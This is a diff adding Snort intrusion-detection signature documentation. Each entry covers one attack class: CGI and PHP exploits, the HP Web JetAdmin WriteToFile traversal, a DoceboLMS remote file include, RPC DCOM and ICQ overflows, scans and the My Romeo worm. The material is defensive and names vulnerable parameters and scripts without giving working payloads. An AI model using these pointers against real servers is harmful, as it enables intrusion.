+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
--- /dev/null
+++ b/doc/signatures/866.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+866
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1539.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1539
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2549.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2549
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the web interface support for the HP JetAdmin printer.
+
+--
+Impact:
+A successful attack may allow a sensitive system file to be overwritten.
+
+--
+Detailed Information:
+The HP Web JetAdmin provides a web interface for the administration of the HP
+Web JetAdmin printer.  A vulnerability is present that allows an existing file
+on the server to be overwritten. This problem exists because the script 
+/plugins/framework/script/tree.xms does not sanitize the value supplied to
+the parameter WriteToFile, permitting a directory traversal from the web root
+directory to any file. An attacker can supply the data to write to the specified
+file.
+
+--
+Affected Systems:
+HP Web JetAdmin 7.2.
+
+--
+Attack Scenarios:
+An attacker can overwrite a sensitive system file using the WriteToFile parameter
+and supplying the data to write to the file. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+The default HP Web JetAdmin port is 8000.  If an administrator selects a different port
+on which to run the web interface, no alert will be detected.  In that case, the rule
+should be altered to reflect the port on which the web interface runs.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch
+when it becomes available.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9973
+
+--
--- /dev/null
+++ b/doc/signatures/115-5.txt
@@ -0,0 +1,71 @@
+
+
+Rule:
+
+--
+Sid:
+115-5
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an asn.1 datum
+length greater than the packet length was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+This indicates that the data length is greater than the packet length
+and may indicate an attempt to cause a buffer overflow or it may be an
+attempt to evade detection by an IDS that may not correctly process
+asn1 data.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
--- /dev/null
+++ b/doc/signatures/677.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid:
+677
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_sp_pa-pz_5x44.asp
+
+--
--- /dev/null
+++ b/doc/signatures/100000525.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000525
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "PHPMyDirectory" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "PIC" parameter in the "offer-pix.php" script 
+used by the "PHPMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMyDirectory
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/3072.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3072
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"status" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/473.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+473
+
+--
+Summary:
+This event is generated when an ICMP Redirect Network message was
+detected in network traffic.
+
+--
+Impact:
+Unknown. Possible system crash, Denial of Service (DoS) for some
+embedded operating systems.
+
+--
+Detailed Information:
+Several susceptible IP Stack implementations may result in the system
+hanging or crashing when malformed or corrupted ICMP Redirect Network
+(Type 5, Code 0) packets are sent to them.  This vulnerability was first
+discovered in 1997.
+
+Under normal network conditions ICMP Redirect Network packets will occur
+in a number of situations. One such situation is when a host is on a
+subnet with more than one router. The host can only have one default
+gateway, and forwards all traffic for networks outside its own subnet to
+this gateway. If the default gateway detects that the gateway for this
+route is on the same subnet as the originating host, the default gateway
+forwards the packet onto this gateway and sends an ICMP Redirect Network
+to the originating host.
+
+This funtionality exists primarily to save network administrators from
+having to keep extensive routing tables on hosts, the host will remember
+the route learned from the ICMP Redirect Network message for a period of
+time, and will forward any traffic directly while it has the route in
+its cache.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+A malicious user may send corrupted ICMP Redirect Net messages to
+networks in an attempt to crash a system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Any ICMP Network Redirect will generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches for Microsoft Windows NT 4.0 were included in SP4, and also
+release as a post SP3 fix - teardrop2-fix.  Fixes are also available for
+Windows 95 and various embedded systems.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft KB, Q154174
+--
--- /dev/null
+++ b/doc/signatures/100000341.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000341
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DoceboLMS" application running on a webserver. Access to the file "help.php" using a remote file being passed as the "lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang" parameter in the "help.php" script used by the "DoceboLMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DoceboLMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1560.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1560
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/358.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+358
+
+--
+
+Summary:
+This event is generated when an attempt is made to login anonymously 
+into an ftp server using a suspicious password (-saint)
+
+--
+
+Impact:
+Possible unauthorized access. Information gathering.
+
+--
+
+Detailed Information:
+Saint is an open-source security scanner which checks for common 
+vulnerabilities. When it detects an open ftp server, it tries to log in 
+anonymously using the password '-saint'
+
+--
+
+Affected Systems:
+Machines running anonymous ftp servers.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs using the Saint Scanner, checking for 
+known vulnerabilities. If the scanner encounters a ftp server, it tries 
+to log in .
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+A user may be using that same password for a legitimate 
+anonymous login.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable anonymous FTP access.
+
+--
+
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS330
+
+--
--- /dev/null
+++ b/doc/signatures/838.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+838
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2445.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+2445
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in multiple versions of Internet Security Systems software.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible leading to unauthorized 
+access to the affected host. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the way that multiple ISS products parse ICQ
+messages. This can lead to execution of arbitrary code on hosts using
+the affected products.
+
+Due to insufficient bounds checking when ISS products parse protocol
+fields in ICQ SRV_META_USER data, a buffer overflow condition can be
+exploited to give an attacker the opportunity to execute arbitrary code
+and gain unauthorized administrative access to the host.
+
+It is possible that this condition can be exploited without the need for
+an established and valid ICQ session. The attacker could create packets
+originating from a host on port 4000 and send specially crafted data to 
+exploit the condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 22.11 and prior
+	RealSecure Server Sensor 7.0 XPU 22.11 and prior
+	RealSecure Server Sensor 6.5 for Windows SR 3.10 and prior
+	Proventia A Series XPU 22.11 and prior
+	Proventia G Series XPU 22.11 and prior
+	Proventia M Series XPU 1.9 and prior
+	RealSecure Desktop 7.0 ebl and prior
+	RealSecure Desktop 3.6 ecf and prior
+	RealSecure Guard 3.6 ecf and prior
+	RealSecure Sentry 3.6 ecf and prior
+	BlackICE Agent for Server 3.6 ecf and prior
+	BlackICE PC Protection 3.6 ccf and prior
+	BlackICE Server Protection 3.6 ccf and prior
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3293.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3293
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1024.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1024
+
+--
+Summary:
+This event is generated when an attempt is made to access the newdsn.exe file, which is a sample program installed with Internet Information Server (IIS) 3.0. 
+
+--
+Impact:
+File creation.  This attack can allow the creation of a new Microsoft Access Database (.mdb) file on the vulnerable server.
+
+--
+Detailed Information:
+IIS 3.0 comes with a sample program newdsn.exe.  An attacker can craft a URL to reference this executable and, as a parameter, pass the name of a new file to be created.  The file may have any extension, but will be considered a Microsoft Access Database file. 
+
+--
+Affected Systems:
+IIS 3.0 servers
+
+--
+Attack Scenarios:
+An attacker can craft a URL to execute the vulnerable newdsn.exe and create a Microsoft Access Database file on the vulnerable server. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete the newdsn.exe file.
+
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0191
+
+
+--
--- /dev/null
+++ b/doc/signatures/1918.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1918
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain which ports a host may be listening on, whether or not the ports are filtered by a firewall and if the host is vulnerable to a particular exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. Then the attacker might find out that the FTP service is vulnerable to a particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1423.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1423
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/376.txt
@@ -0,0 +1,56 @@
+Rule:
+--
+
+Sid:
+376
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS159
+
+--
--- /dev/null
+++ b/doc/signatures/3239.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3239
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2348.txt
@@ -0,0 +1,53 @@
+Rule:  
+
+--
+Sid:
+2348
+
+--
+Summary:
+This rule does not generate an event. I does activate sid 2349 however.s
+
+--
+Impact:
+Intelligence gathering.
+
+--
+Detailed Information:
+This rule checks for a bind to a print spool using DCE RPC. This may be
+an attempt to check for printer and printer services available on a
+host. Sid 2349 will generate an event when an attempt is made to
+enumerate the printer service on a host.
+
+--
+Affected Systems:
+	All Microsoft DCE RPC enabled systems
+	
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/727.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+727
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
